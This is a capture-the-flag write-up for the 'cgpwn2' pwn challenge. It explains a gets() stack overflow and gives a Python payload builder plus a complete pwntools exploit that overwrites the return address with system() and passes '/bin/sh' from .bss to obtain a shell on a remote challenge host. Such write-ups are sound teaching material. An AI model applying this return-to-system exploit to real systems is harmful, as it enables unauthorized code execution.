pwn: cgpwn2

0x01 Finding the vulnerability

checksec


IDA analysis

Going into the hello() function, there is a stack overflow: gets() reads user input into a fixed-size stack buffer with no length check, so the saved return address can be overwritten.

  • name is in the .bss section, so its address is fixed and known (no PIE)
  • name is filled by fgets(), so we can write an arbitrary string there
  • the binary calls system(), but it contains no "/bin/sh" string

0x02 Exploitation analysis

First write "/bin/sh" into name through fgets(). Then use the stack overflow to overwrite the saved return address with the address of system(), put a dummy return address after it, and set the first argument to the address of name. When hello() returns, system("/bin/sh") runs and we get a shell.
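The stack layout behind that payload, written out as an added example (this is not code from the original writeup and not pwntools; p32 is reimplemented with struct so it runs offline). The offset 0x26 and the two addresses are the ones used in the writeup; the function names, the slot names, and the trailing-newline check for gets() are my own additions.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian value, same as pwntools' p32()."""
    return struct.pack("<I", value)


def ret2system_payload(buf_to_ebp, system_addr, arg_addr,
                       fake_ret=b"aaaa", filler=b"a"):
    """Build a 32-bit return-to-function payload for a gets() overflow.

    Frame after the overwrite, from low to high addresses:
      buffer ... | saved ebp | saved eip | callee's return addr | arg1
    When hello() returns into system(), the CPU pops saved eip, so on
    entry system() sees its "return address" at [esp] and its first
    argument at [esp+4], exactly like a normal cdecl call.
    """
    payload = filler * buf_to_ebp   # start of buffer up to saved ebp
    payload += filler * 4           # saved ebp, clobbered (never used again)
    payload += p32(system_addr)     # saved eip -> system()
    payload += fake_ret             # where system() would return (crash is fine)
    payload += p32(arg_addr)        # first argument: pointer into .bss (name)
    return payload


def gets_delivers_intact(payload):
    """gets() stops at the first newline, so a 0x0a byte inside any
    address or filler cuts the payload short before it reaches the
    saved return address. NUL bytes are not a problem for gets()."""
    return b"\n" not in payload


def slot_of(payload, buf_to_ebp):
    """Map each overwritten stack slot to the bytes that land in it,
    to compare against the stack view in IDA."""
    off = buf_to_ebp
    return {
        "saved_ebp": payload[off:off + 4],
        "saved_eip": payload[off + 4:off + 8],
        "callee_ret": payload[off + 8:off + 12],
        "arg1": payload[off + 12:off + 16],
    }


if __name__ == "__main__":
    # Constants taken from the writeup: system() and name in cgpwn2.
    SYSTEM_ADDR = 0x08048420
    NAME_ADDR = 0x0804A080      # name in .bss, filled with "/bin/sh" by fgets()
    p = ret2system_payload(0x26, SYSTEM_ADDR, NAME_ADDR)
    print(p.hex())
    print(slot_of(p, 0x26))
    print("survives gets():", gets_delivers_intact(p))
```

The newline check is the one thing worth running before every send: a target address such as 0x0804A00A would pack to bytes containing 0x0a, and gets() would silently stop there, leaving the saved eip untouched.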

0x03 Exploit

#!/usr/bin/env python
from pwn import *

io = remote("111.198.29.45", 37884)
# io = process("./cgpwn2")

context.log_level = 'debug'

sys_addr = 0x08048420      # address of system() in the binary (from IDA)
bin_sh_addr = 0x0804A080   # address of name in .bss, written by fgets()

# first input: put the string system() should run into name
io.recvuntil(b"your name")
io.sendline(b"/bin/sh")

# second input: overflow the gets() buffer
# 0x26 bytes reach the saved ebp, 4 bytes overwrite it, then:
# saved eip -> system(), fake return address, first argument -> name
io.recvuntil(b"leave some message here:")
payload = b"a" * 0x26 + b"aaaa" + p32(sys_addr) + b"aaaa" + p32(bin_sh_addr)
io.sendline(payload)

io.interactive()

Origin blog.csdn.net/qq_43430261/article/details/102684035